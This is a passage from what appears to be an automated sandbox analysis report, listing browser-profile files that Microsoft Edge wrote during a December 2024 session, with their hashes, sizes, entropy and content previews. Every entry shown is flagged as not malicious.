                                                                                                                                                                                                                                                                                                        Preview:~.';.................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1735064914404.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735064915300.._https://ntp.msn.com..MUID!.302665E99E416E3C182470B69FCB6F6B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735064914480,"schedule":[9,-1,-1,30,-1,-1,18],"scheduleFixed":[9,-1,-1,30,-1,-1,18],"simpleSchedule":[29,20,50,10,51,46,22]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735064914359.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Tue Dec 24 2024 13:28:33 GMT-0500 (Eastern Standard

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.13922699530752
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NWR3q2PN723oH+Tcwt8a2jMGIFUt8EWJZmw+EW3kwON723oH+Tcwt8a2jMmLJ:0R3vVaYeb8EFUt8/J/+/35OaYeb8bJ
                                                                                                                                                                                                                                                                                                        MD5:4D9389D404C92BD198826D1AB206C9B5
                                                                                                                                                                                                                                                                                                        SHA1:D662F10CF5028559948DE9D82085AF07B99ADE48
                                                                                                                                                                                                                                                                                                        SHA-256:7FE6383274BB60FF4E09EA230B88A7873A7F7DDDA56893B234AD650960F07DDD
                                                                                                                                                                                                                                                                                                        SHA-512:D89963D26B04A8B8C757B1D889AFA2C9AE0723C6E4357AC91C028F3554A32C16D167FDCECD89F44A61FBC4D5C64BF550A4A1A77444704468E1B3BCA2E32D30A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.054 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/24-13:28:20.055 b90 Recovering log #3.2024/12/24-13:28:20.059 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.13922699530752
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NWR3q2PN723oH+Tcwt8a2jMGIFUt8EWJZmw+EW3kwON723oH+Tcwt8a2jMmLJ:0R3vVaYeb8EFUt8/J/+/35OaYeb8bJ
                                                                                                                                                                                                                                                                                                        MD5:4D9389D404C92BD198826D1AB206C9B5
                                                                                                                                                                                                                                                                                                        SHA1:D662F10CF5028559948DE9D82085AF07B99ADE48
                                                                                                                                                                                                                                                                                                        SHA-256:7FE6383274BB60FF4E09EA230B88A7873A7F7DDDA56893B234AD650960F07DDD
                                                                                                                                                                                                                                                                                                        SHA-512:D89963D26B04A8B8C757B1D889AFA2C9AE0723C6E4357AC91C028F3554A32C16D167FDCECD89F44A61FBC4D5C64BF550A4A1A77444704468E1B3BCA2E32D30A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.054 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/24-13:28:20.055 b90 Recovering log #3.2024/12/24-13:28:20.059 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5b9c9fb1-f86f-4e8b-8b49-9d66230b53e6.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\96125c22-6872-4a2d-bb3c-5df94f1c9506.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.785172024931222
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:te+AuHFpoxLnqiAC4xnxhkHtSGvx0PXgathm8jLdo4XckO0L/ZJV8Y:tTlp414xxaHtdJ0PXgF8NFXcf0L/ZJVb
                                                                                                                                                                                                                                                                                                        MD5:78B71B37A8B7CEF55725B9B267B9E2F6
                                                                                                                                                                                                                                                                                                        SHA1:E1E16CFCEC530DEFA402B36DFED54979E39ECB5B
                                                                                                                                                                                                                                                                                                        SHA-256:842EAC6D68A227A95079D215C25823CE44354DFC929471AB586AD1377B7766B8
                                                                                                                                                                                                                                                                                                        SHA-512:AE745B953E25D7416356F8F8801285B7E3737147B34C5BA2E43DDB4BFC65DE147BABAF24D3393222C3ABD9873597F82F515161F5514C0834282D524A0A4C5322
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.3785207723930382
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9W7:uIEumQv8m1ccnvS66YlGFh5lQpaw1a
                                                                                                                                                                                                                                                                                                        MD5:FFCA0889292D29C307F62364046E96EF
                                                                                                                                                                                                                                                                                                        SHA1:85BADAE632576AF1A593D53D9712BE4961144210
                                                                                                                                                                                                                                                                                                        SHA-256:E079B07304EC84FE832F68C2A2352B0126F1FB7165E5713CA7BB46058ED511B4
                                                                                                                                                                                                                                                                                                        SHA-512:4EA18AE4B76B6A509A52913CE92FE04E03046D01C66D30AEEBAB3821035D57A45CE89BA201A6DEACA8E051AB528C253DBC01FE50BFD8D017B0BC8C66C66ABC80
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF492a7.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4ae7c.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a9752643-db47-4640-812a-d9f4102c161c.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d7c13138-330d-45a7-ac5a-95d6e5442521.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f62391e9-87cf-4f46-98e3-6cdfa6fdd5c3.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                                                                                                        MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                                                                                                        SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                                                                                                        SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                                                                                                        SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9756
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108335505712741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXkdpTsvVaFvrE9kJcW8ObV+Fh/QAsU5PCYJ:stXQTsvVCD5bG1QKd
                                                                                                                                                                                                                                                                                                        MD5:7966B4938865BBADF89F5840E6D8A0A8
                                                                                                                                                                                                                                                                                                        SHA1:C4A33ADF1A37A56CA7ABC7FE93B9456F75FFBE61
                                                                                                                                                                                                                                                                                                        SHA-256:2B1263B97D8721D6CDD31345CC48C5B837DAFD5075555A3C876F9CF49662DFC5
                                                                                                                                                                                                                                                                                                        SHA-512:27F40F81F1755085720EFA1D8B6354AB89CC9CF844DF0CD44E4D5BCDA8887DD2F3F1D583ECB715D420336DF97F4145BB5A60A64107586F278E2D6D32EECF796D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379538500400205","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4e77e.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9756
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108335505712741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXkdpTsvVaFvrE9kJcW8ObV+Fh/QAsU5PCYJ:stXQTsvVCD5bG1QKd
                                                                                                                                                                                                                                                                                                        MD5:7966B4938865BBADF89F5840E6D8A0A8
                                                                                                                                                                                                                                                                                                        SHA1:C4A33ADF1A37A56CA7ABC7FE93B9456F75FFBE61
                                                                                                                                                                                                                                                                                                        SHA-256:2B1263B97D8721D6CDD31345CC48C5B837DAFD5075555A3C876F9CF49662DFC5
                                                                                                                                                                                                                                                                                                        SHA-512:27F40F81F1755085720EFA1D8B6354AB89CC9CF844DF0CD44E4D5BCDA8887DD2F3F1D583ECB715D420336DF97F4145BB5A60A64107586F278E2D6D32EECF796D
                                                                                                                                                                                                                                                                                                        Malicious:false
